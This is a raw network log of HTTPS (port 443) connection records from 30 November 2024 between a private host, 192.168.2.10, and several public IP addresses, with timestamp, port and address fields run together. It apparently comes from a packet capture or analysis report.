                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.489053011 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.546463013 CET49970443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.585925102 CET49970443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.585943937 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.586724043 CET49970443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.586728096 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.681391954 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.681438923 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.681559086 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.682189941 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.682202101 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.693449020 CET4434996713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.694865942 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.695225954 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.697340965 CET4434996713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.697434902 CET49967443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.699507952 CET49967443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.699529886 CET4434996713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.699542999 CET49967443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.699548960 CET4434996713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.701911926 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.701920033 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.704653025 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.704662085 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.704685926 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.704691887 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.708736897 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.708784103 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.708846092 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.709180117 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.709192038 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.710453033 CET4434996913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.711885929 CET4434996813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.711990118 CET4434996813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712034941 CET4434996813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712044001 CET49968443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712071896 CET49968443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712090015 CET49968443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712109089 CET4434996813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712120056 CET49968443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.712126017 CET4434996813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.714396000 CET4434996913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.714449883 CET49969443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.718544960 CET49969443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.718564987 CET4434996913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.718580008 CET49969443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.718585014 CET4434996913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.720717907 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.720774889 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.720874071 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.720990896 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.721008062 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.729613066 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.729650974 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.729722023 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.729871035 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.729882002 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.737488031 CET4434996694.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.737548113 CET49966443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.737555027 CET4434996694.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.737601042 CET49966443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.738540888 CET49966443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.738564968 CET4434996694.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.923058033 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.926939011 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.927031994 CET49970443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.927094936 CET49970443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.927109003 CET4434997013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.930629015 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.930677891 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.930752993 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.930951118 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:02.930967093 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.202059984 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.202941895 CET49972443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.202974081 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.203556061 CET49972443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.203561068 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.222378969 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.222430944 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.222489119 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.222812891 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.222821951 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.375808954 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.381210089 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.381226063 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.382081032 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.382275105 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.387177944 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.387229919 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.387403965 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.387414932 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.438751936 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.734894037 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.734956026 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.735014915 CET49972443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.735308886 CET49972443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.735337973 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.735353947 CET49972443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.735359907 CET4434997213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.739202023 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.739233017 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.739340067 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.739752054 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.739759922 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.741087914 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.741162062 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.741216898 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.741339922 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.742563963 CET49971443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.742573023 CET4434997194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.940366030 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.940388918 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.940453053 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.940512896 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.940556049 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.943021059 CET49973443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.943038940 CET4434997323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.948395967 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.948434114 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.948507071 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.948697090 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:03.948709965 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.228578091 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.228620052 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.228699923 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.228974104 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.228986979 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.236293077 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.236398935 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.238712072 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.238718033 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.239017963 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.245712042 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.291325092 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.479610920 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.481525898 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.481540918 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.482076883 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.482083082 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.557749033 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.559201002 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.559279919 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.559715033 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.559730053 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.583517075 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.584084034 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.584096909 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.584594011 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.584599018 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.712642908 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.712738037 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.765902042 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.765925884 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.767761946 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.767775059 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.768131018 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.768137932 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.786906004 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.788991928 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.789005995 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.789558887 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.789562941 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872273922 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872299910 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872318029 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872400045 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872417927 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.872473001 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908715010 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908762932 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908829927 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908864021 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908864021 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.908885002 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.911243916 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.911243916 CET49974443192.168.2.1020.12.23.50
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.911262989 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.911271095 CET4434997420.12.23.50192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.915472984 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.917618990 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.917840004 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.918013096 CET49976443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.918030977 CET4434997613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.929615974 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.929640055 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.929723024 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.930078983 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:04.930090904 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.011574030 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.014688969 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.014739990 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.014843941 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.037905931 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.038168907 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.038284063 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.240636110 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.243851900 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.245049000 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.261993885 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.299904108 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.299904108 CET49975443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.299952984 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.299972057 CET4434997513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.302947044 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.302947044 CET49977443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.302977085 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.302989006 CET4434997713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.307913065 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.307941914 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.308528900 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.311254978 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.311254978 CET49978443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.311280966 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.311285973 CET4434997813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.328095913 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.328259945 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.328368902 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.330851078 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.330884933 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.331156969 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.332726955 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.332745075 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.334423065 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.334449053 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.334651947 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.334794998 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.334805965 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.349280119 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.349313021 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.349400997 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.364340067 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.364358902 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.371330976 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.465430021 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.509854078 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.509869099 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.510421038 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.510426044 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.715987921 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.716057062 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.716698885 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.716712952 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.718951941 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.718966007 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.718987942 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.718991995 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727216959 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727251053 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727258921 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727281094 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727328062 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727354050 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727364063 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727369070 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.727422953 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.729146004 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.729222059 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.729279995 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.730231047 CET49979443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.730248928 CET4434997994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.730765104 CET49981443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.730772018 CET4434998123.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.736839056 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.736882925 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.736942053 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.737221003 CET49987443192.168.2.1023.200.3.11
